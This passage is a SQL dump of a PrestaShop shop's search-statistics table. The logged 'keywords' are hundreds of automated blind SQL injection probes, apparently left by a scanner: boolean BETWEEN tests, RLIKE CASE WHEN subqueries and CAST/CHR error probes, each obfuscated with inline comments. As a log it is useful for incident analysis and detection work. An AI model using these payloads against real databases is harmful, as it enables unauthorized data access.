(1747, 1, 1, 'fJTD\')/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/TbCR', 0, '2024-10-24 19:29:11'),
(1748, 1, 1, 'fJTD\')/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/TbCR', 0, '2024-10-24 19:29:12'),
(1749, 1, 1, 'fJTD\'))/**/AND/**/8859/**/BETWEEN/**/4126/**/AND/**/4126--/**/BAwR', 0, '2024-10-24 19:29:13'),
(1750, 1, 1, 'fJTD\'))/**/AND/**/8859/**/BETWEEN/**/4126/**/AND/**/4126--/**/BAwR', 0, '2024-10-24 19:29:15'),
(1751, 1, 1, 'fJTD\'))/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/nREz', 0, '2024-10-24 19:29:16'),
(1752, 1, 1, 'fJTD\'))/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/nREz', 0, '2024-10-24 19:29:17'),
(1753, 1, 1, 'fJTD\'/**/AND/**/1319/**/BETWEEN/**/7631/**/AND/**/7631--/**/IghW', 0, '2024-10-24 19:29:18'),
(1754, 1, 1, 'fJTD\'/**/AND/**/1319/**/BETWEEN/**/7631/**/AND/**/7631--/**/IghW', 0, '2024-10-24 19:29:19'),
(1755, 1, 1, 'fJTD\'/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/NfcL', 0, '2024-10-24 19:29:21'),
(1756, 1, 1, 'fJTD\'/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/NfcL', 0, '2024-10-24 19:29:23'),
(1757, 1, 1, 'fJTD%\'/**/AND/**/5280/**/BETWEEN/**/5214/**/AND/**/5214--/**/LOWz', 0, '2024-10-24 19:29:24'),
(1758, 1, 1, 'fJTD%\'/**/AND/**/5280/**/BETWEEN/**/5214/**/AND/**/5214--/**/LOWz', 0, '2024-10-24 19:29:25'),
(1759, 1, 1, 'fJTD%\'/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/qRoq', 0, '2024-10-24 19:29:26'),
(1760, 1, 1, 'fJTD%\'/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/qRoq', 0, '2024-10-24 19:29:27'),
(1761, 1, 1, 'fJTD\")/**/AND/**/9834/**/BETWEEN/**/7600/**/AND/**/7600--/**/djBs', 0, '2024-10-24 19:29:28'),
(1762, 1, 1, 'fJTD\")/**/AND/**/9834/**/BETWEEN/**/7600/**/AND/**/7600--/**/djBs', 0, '2024-10-24 19:29:29'),
(1763, 1, 1, 'fJTD\")/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/yDMk', 0, '2024-10-24 19:29:31'),
(1764, 1, 1, 'fJTD\")/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/yDMk', 0, '2024-10-24 19:29:32'),
(1765, 1, 1, 'fJTD\"/**/AND/**/3622/**/BETWEEN/**/8519/**/AND/**/8519--/**/NLnW', 0, '2024-10-24 19:29:33'),
(1766, 1, 1, 'fJTD\"/**/AND/**/3622/**/BETWEEN/**/8519/**/AND/**/8519--/**/NLnW', 0, '2024-10-24 19:29:35'),
(1767, 1, 1, 'fJTD\"/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/HZnh', 0, '2024-10-24 19:29:36'),
(1768, 1, 1, 'fJTD\"/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/HZnh', 0, '2024-10-24 19:29:37'),
(1769, 1, 1, 'fJTD)/**/AND/**/8982/**/BETWEEN/**/4336/**/AND/**/4336--/**/UwYu', 0, '2024-10-24 19:29:38'),
(1770, 1, 1, 'fJTD)/**/AND/**/8982/**/BETWEEN/**/4336/**/AND/**/4336--/**/UwYu', 0, '2024-10-24 19:29:39'),
(1771, 1, 1, 'fJTD)/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/FwSD', 0, '2024-10-24 19:29:40'),
(1772, 1, 1, 'fJTD)/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/FwSD', 0, '2024-10-24 19:29:41'),
(1773, 1, 1, 'fJTD))/**/AND/**/6599/**/BETWEEN/**/1985/**/AND/**/1985--/**/JahG', 0, '2024-10-24 19:29:42'),
(1774, 1, 1, 'fJTD))/**/AND/**/6599/**/BETWEEN/**/1985/**/AND/**/1985--/**/JahG', 0, '2024-10-24 19:29:43'),
(1775, 1, 1, 'fJTD))/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/IBtW', 0, '2024-10-24 19:29:44'),
(1776, 1, 1, 'fJTD))/**/AND/**/7581/**/BETWEEN/**/7581/**/AND/**/7581--/**/IBtW', 0, '2024-10-24 19:29:45'),
(1777, 1, 1, '-1711\')/**/OR/**/8406/**/BETWEEN/**/5883/**/AND/**/5883--/**/lYFp', 0, '2024-10-24 19:29:47'),
(1778, 1, 1, '-1711\')/**/OR/**/8406/**/BETWEEN/**/5883/**/AND/**/5883--/**/lYFp', 0, '2024-10-24 19:29:48'),
(1779, 1, 1, '-8895\')/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/ipfG', 0, '2024-10-24 19:29:49'),
(1780, 1, 1, '-8895\')/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/ipfG', 0, '2024-10-24 19:29:55'),
(1781, 1, 1, '-7010\')/**/OR/**/9013/**/BETWEEN/**/7637/**/AND/**/7637--/**/dLHf', 0, '2024-10-24 19:29:56'),
(1782, 1, 1, '-7010\')/**/OR/**/9013/**/BETWEEN/**/7637/**/AND/**/7637--/**/dLHf', 0, '2024-10-24 19:29:57'),
(1783, 1, 1, '-4786\'))/**/OR/**/9818/**/BETWEEN/**/3106/**/AND/**/3106--/**/sjQR', 0, '2024-10-24 19:29:58'),
(1784, 1, 1, '-4786\'))/**/OR/**/9818/**/BETWEEN/**/3106/**/AND/**/3106--/**/sjQR', 0, '2024-10-24 19:30:00'),
(1785, 1, 1, '-9914\'))/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/EIXy', 0, '2024-10-24 19:30:01'),
(1786, 1, 1, '-9914\'))/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/EIXy', 0, '2024-10-24 19:30:03'),
(1787, 1, 1, '-9774\'))/**/OR/**/7971/**/BETWEEN/**/8859/**/AND/**/8859--/**/befq', 0, '2024-10-24 19:30:04'),
(1788, 1, 1, '-9774\'))/**/OR/**/7971/**/BETWEEN/**/8859/**/AND/**/8859--/**/befq', 0, '2024-10-24 19:30:06'),
(1789, 1, 1, '-7852\'/**/OR/**/2006/**/BETWEEN/**/6921/**/AND/**/6921--/**/ZkoP', 0, '2024-10-24 19:30:07'),
(1790, 1, 1, '-7852\'/**/OR/**/2006/**/BETWEEN/**/6921/**/AND/**/6921--/**/ZkoP', 0, '2024-10-24 19:30:08'),
(1791, 1, 1, '-8247\'/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/GAZl', 0, '2024-10-24 19:30:09'),
(1792, 1, 1, '-8247\'/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/GAZl', 0, '2024-10-24 19:30:10'),
(1793, 1, 1, '-3638\'/**/OR/**/8821/**/BETWEEN/**/2444/**/AND/**/2444--/**/ncjH', 0, '2024-10-24 19:30:11'),
(1794, 1, 1, '-3638\'/**/OR/**/8821/**/BETWEEN/**/2444/**/AND/**/2444--/**/ncjH', 0, '2024-10-24 19:30:13'),
(1795, 1, 1, '-1690%\'/**/OR/**/2341/**/BETWEEN/**/1447/**/AND/**/1447--/**/FXMw', 0, '2024-10-24 19:30:14'),
(1796, 1, 1, '-1690%\'/**/OR/**/2341/**/BETWEEN/**/1447/**/AND/**/1447--/**/FXMw', 0, '2024-10-24 19:30:15'),
(1797, 1, 1, '-4955%\'/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/Ppaz', 0, '2024-10-24 19:30:16'),
(1798, 1, 1, '-4955%\'/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/Ppaz', 0, '2024-10-24 19:30:17'),
(1799, 1, 1, '-5511%\'/**/OR/**/2229/**/BETWEEN/**/3581/**/AND/**/3581--/**/JddE', 0, '2024-10-24 19:30:18'),
(1800, 1, 1, '-5511%\'/**/OR/**/2229/**/BETWEEN/**/3581/**/AND/**/3581--/**/JddE', 0, '2024-10-24 19:30:19'),
(1801, 1, 1, '-2612\")/**/OR/**/6408/**/BETWEEN/**/6449/**/AND/**/6449--/**/TyUX', 0, '2024-10-24 19:30:20'),
(1802, 1, 1, '-2612\")/**/OR/**/6408/**/BETWEEN/**/6449/**/AND/**/6449--/**/TyUX', 0, '2024-10-24 19:30:21'),
(1803, 1, 1, '-3281\")/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/cdDx', 0, '2024-10-24 19:30:23'),
(1804, 1, 1, '-3281\")/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/cdDx', 0, '2024-10-24 19:30:24'),
(1805, 1, 1, '-5689\")/**/OR/**/8222/**/BETWEEN/**/4069/**/AND/**/4069--/**/RQWF', 0, '2024-10-24 19:30:25'),
(1806, 1, 1, '-5689\")/**/OR/**/8222/**/BETWEEN/**/4069/**/AND/**/4069--/**/RQWF', 0, '2024-10-24 19:30:26'),
(1807, 1, 1, '-3733\"/**/OR/**/9798/**/BETWEEN/**/2712/**/AND/**/2712--/**/OVdn', 0, '2024-10-24 19:30:27'),
(1808, 1, 1, '-3733\"/**/OR/**/9798/**/BETWEEN/**/2712/**/AND/**/2712--/**/OVdn', 0, '2024-10-24 19:30:29'),
(1809, 1, 1, '-1438\"/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/oxih', 0, '2024-10-24 19:30:30'),
(1810, 1, 1, '-1438\"/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/oxih', 0, '2024-10-24 19:30:32'),
(1811, 1, 1, '-2301\"/**/OR/**/5715/**/BETWEEN/**/9793/**/AND/**/9793--/**/lWtW', 0, '2024-10-24 19:30:33'),
(1812, 1, 1, '-2301\"/**/OR/**/5715/**/BETWEEN/**/9793/**/AND/**/9793--/**/lWtW', 0, '2024-10-24 19:30:35'),
(1813, 1, 1, '-2353)/**/OR/**/7113/**/BETWEEN/**/9011/**/AND/**/9011--/**/FWqp', 0, '2024-10-24 19:30:36'),
(1814, 1, 1, '-2353)/**/OR/**/7113/**/BETWEEN/**/9011/**/AND/**/9011--/**/FWqp', 0, '2024-10-24 19:30:37'),
(1815, 1, 1, '-5092)/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/IFCe', 0, '2024-10-24 19:30:38'),
(1816, 1, 1, '-5092)/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/IFCe', 0, '2024-10-24 19:30:39'),
(1817, 1, 1, '-4390)/**/OR/**/2250/**/BETWEEN/**/6915/**/AND/**/6915--/**/enZQ', 0, '2024-10-24 19:30:40'),
(1818, 1, 1, '-4390)/**/OR/**/2250/**/BETWEEN/**/6915/**/AND/**/6915--/**/enZQ', 0, '2024-10-24 19:30:42'),
(1819, 1, 1, '-5403))/**/OR/**/6953/**/BETWEEN/**/2947/**/AND/**/2947--/**/hPZK', 0, '2024-10-24 19:30:43'),
(1820, 1, 1, '-5403))/**/OR/**/6953/**/BETWEEN/**/2947/**/AND/**/2947--/**/hPZK', 0, '2024-10-24 19:30:44'),
(1821, 1, 1, '-2638))/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/gnKN', 0, '2024-10-24 19:30:45'),
(1822, 1, 1, '-2638))/**/OR/**/4179/**/BETWEEN/**/4179/**/AND/**/4179--/**/gnKN', 0, '2024-10-24 19:30:46'),
(1823, 1, 1, '-4152))/**/OR/**/8054/**/BETWEEN/**/7015/**/AND/**/7015--/**/Qxat', 0, '2024-10-24 19:30:47'),
(1824, 1, 1, '-4152))/**/OR/**/8054/**/BETWEEN/**/7015/**/AND/**/7015--/**/Qxat', 0, '2024-10-24 19:30:48'),
(1825, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(9430=8390)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'RPWg\'=\'RPWg', 1, '2024-10-24 19:30:49'),
(1826, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(9430=8390)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'RPWg\'=\'RPWg', 1, '2024-10-24 19:30:52'),
(1827, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'VVRt\'=\'VVRt', 1, '2024-10-24 19:30:53'),
(1828, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'VVRt\'=\'VVRt', 1, '2024-10-24 19:30:55'),
(1829, 1, 1, 'fJTD\'))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(5010=5302)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((\'wEVb\'=\'wEVb', 1, '2024-10-24 19:30:56'),
(1830, 1, 1, 'fJTD\'))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(5010=5302)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((\'wEVb\'=\'wEVb', 1, '2024-10-24 19:30:58'),
(1831, 1, 1, 'fJTD\'))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((\'sGot\'=\'sGot', 1, '2024-10-24 19:30:59'),
(1832, 1, 1, 'fJTD\'))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((\'sGot\'=\'sGot', 1, '2024-10-24 19:31:00'),
(1833, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(3359=4695)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'IFoR\'=\'IFoR', 1, '2024-10-24 19:31:01'),
(1834, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(3359=4695)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'IFoR\'=\'IFoR', 1, '2024-10-24 19:31:02'),
(1835, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'hfQZ\'=\'hfQZ', 1, '2024-10-24 19:31:04'),
(1836, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'hfQZ\'=\'hfQZ', 1, '2024-10-24 19:31:06'),
(1837, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(9963=7997)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'HIHE\'/**/LIKE/**/\'HIHE', 1, '2024-10-24 19:31:07'),
(1838, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(9963=7997)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'HIHE\'/**/LIKE/**/\'HIHE', 1, '2024-10-24 19:31:09'),
(1839, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'Ryzu\'/**/LIKE/**/\'Ryzu', 1, '2024-10-24 19:31:10');
INSERT INTO `ps_statssearch` (`id_statssearch`, `id_shop`, `id_shop_group`, `keywords`, `results`, `date_add`) VALUES
(1840, 1, 1, 'fJTD\')/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\'Ryzu\'/**/LIKE/**/\'Ryzu', 1, '2024-10-24 19:31:11'),
(1841, 1, 1, 'fJTD%\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(2769=6349)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'wdTV%\'=\'wdTV', 1, '2024-10-24 19:31:12'),
(1842, 1, 1, 'fJTD%\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(2769=6349)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'wdTV%\'=\'wdTV', 1, '2024-10-24 19:31:14'),
(1843, 1, 1, 'fJTD%\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'Upll%\'=\'Upll', 1, '2024-10-24 19:31:15'),
(1844, 1, 1, 'fJTD%\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'Upll%\'=\'Upll', 1, '2024-10-24 19:31:16'),
(1845, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8939=9988)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'ZoEZ\'/**/LIKE/**/\'ZoEZ', 1, '2024-10-24 19:31:17'),
(1846, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8939=9988)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'ZoEZ\'/**/LIKE/**/\'ZoEZ', 1, '2024-10-24 19:31:18'),
(1847, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'aSJi\'/**/LIKE/**/\'aSJi', 1, '2024-10-24 19:31:20'),
(1848, 1, 1, 'fJTD\'/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\'aSJi\'/**/LIKE/**/\'aSJi', 1, '2024-10-24 19:31:21'),
(1849, 1, 1, 'fJTD\")/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(6757=5032)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\"tllj\"=\"tllj', 1, '2024-10-24 19:31:22'),
(1850, 1, 1, 'fJTD\")/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(6757=5032)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\"tllj\"=\"tllj', 1, '2024-10-24 19:31:23'),
(1851, 1, 1, 'fJTD\")/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\"cPkA\"=\"cPkA', 1, '2024-10-24 19:31:26'),
(1852, 1, 1, 'fJTD\")/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(\"cPkA\"=\"cPkA', 1, '2024-10-24 19:31:27'),
(1853, 1, 1, 'fJTD\"/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(5456=2791)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\"zzqU\"=\"zzqU', 1, '2024-10-24 19:31:28'),
(1854, 1, 1, 'fJTD\"/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(5456=2791)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\"zzqU\"=\"zzqU', 1, '2024-10-24 19:31:29'),
(1855, 1, 1, 'fJTD\"/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\"JZmj\"=\"JZmj', 1, '2024-10-24 19:31:30'),
(1856, 1, 1, 'fJTD\"/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/\"JZmj\"=\"JZmj', 1, '2024-10-24 19:31:31'),
(1857, 1, 1, 'fJTD)/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(4901=9648)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(4558/**/BETWEEN/**/4558/**/AND/**/4558', 1, '2024-10-24 19:31:32'),
(1858, 1, 1, 'fJTD)/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(4901=9648)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(4558/**/BETWEEN/**/4558/**/AND/**/4558', 1, '2024-10-24 19:31:34'),
(1859, 1, 1, 'fJTD)/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(2331/**/BETWEEN/**/2331/**/AND/**/2331', 1, '2024-10-24 19:31:35'),
(1860, 1, 1, 'fJTD)/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/(2331/**/BETWEEN/**/2331/**/AND/**/2331', 1, '2024-10-24 19:31:39'),
(1861, 1, 1, 'fJTD))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(6158=8791)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((8372/**/BETWEEN/**/8372/**/AND/**/8372', 1, '2024-10-24 19:31:40'),
(1862, 1, 1, 'fJTD))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(6158=8791)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((8372/**/BETWEEN/**/8372/**/AND/**/8372', 1, '2024-10-24 19:31:41'),
(1863, 1, 1, 'fJTD))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((2522/**/BETWEEN/**/2522/**/AND/**/2522', 1, '2024-10-24 19:31:43'),
(1864, 1, 1, 'fJTD))/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))/**/AND/**/((2522/**/BETWEEN/**/2522/**/AND/**/2522', 1, '2024-10-24 19:31:44'),
(1865, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(7404=1774)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))', 1, '2024-10-24 19:31:46'),
(1866, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(7404=1774)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))', 1, '2024-10-24 19:31:47'),
(1867, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))', 1, '2024-10-24 19:31:49'),
(1868, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))', 1, '2024-10-24 19:31:51'),
(1869, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(7542=6582)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))--/**/HMwI', 1, '2024-10-24 19:31:52'),
(1870, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(7542=6582)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))--/**/HMwI', 1, '2024-10-24 19:31:53'),
(1871, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))--/**/PjTZ', 1, '2024-10-24 19:31:55'),
(1872, 1, 1, 'fJTD/**/RLIKE/**/(SELECT/**/(CASE/**/WHEN/**/(8873=8873)/**/THEN/**/0x664a5444/**/ELSE/**/0x28/**/END))--/**/PjTZ', 1, '2024-10-24 19:31:56'),
(1873, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4431=3664)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(87)||CHR(89)||CHR(110)||CHR(86))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'JxQC\'=\'JxQC', 3, '2024-10-24 19:31:59'),
(1874, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4431=3664)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(87)||CHR(89)||CHR(110)||CHR(86))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'JxQC\'=\'JxQC', 3, '2024-10-24 19:32:01'),
(1875, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'sMGL\'=\'sMGL', 3, '2024-10-24 19:32:04'),
(1876, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'sMGL\'=\'sMGL', 3, '2024-10-24 19:32:05'),
(1877, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(5588=9212)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(97)||CHR(122)||CHR(89)||CHR(104))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((\'OoWI\'=\'OoWI', 3, '2024-10-24 19:32:09'),
(1878, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(5588=9212)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(97)||CHR(122)||CHR(89)||CHR(104))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((\'OoWI\'=\'OoWI', 3, '2024-10-24 19:32:10'),
(1879, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((\'mbEz\'=\'mbEz', 3, '2024-10-24 19:32:11'),
(1880, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((\'mbEz\'=\'mbEz', 3, '2024-10-24 19:32:13'),
(1881, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9607=1219)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(99)||CHR(100)||CHR(82)||CHR(84))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'Fnla\'=\'Fnla', 3, '2024-10-24 19:32:14'),
(1882, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9607=1219)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(99)||CHR(100)||CHR(82)||CHR(84))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'Fnla\'=\'Fnla', 3, '2024-10-24 19:32:15'),
(1883, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'jMJP\'=\'jMJP', 3, '2024-10-24 19:32:17'),
(1884, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'jMJP\'=\'jMJP', 3, '2024-10-24 19:32:18'),
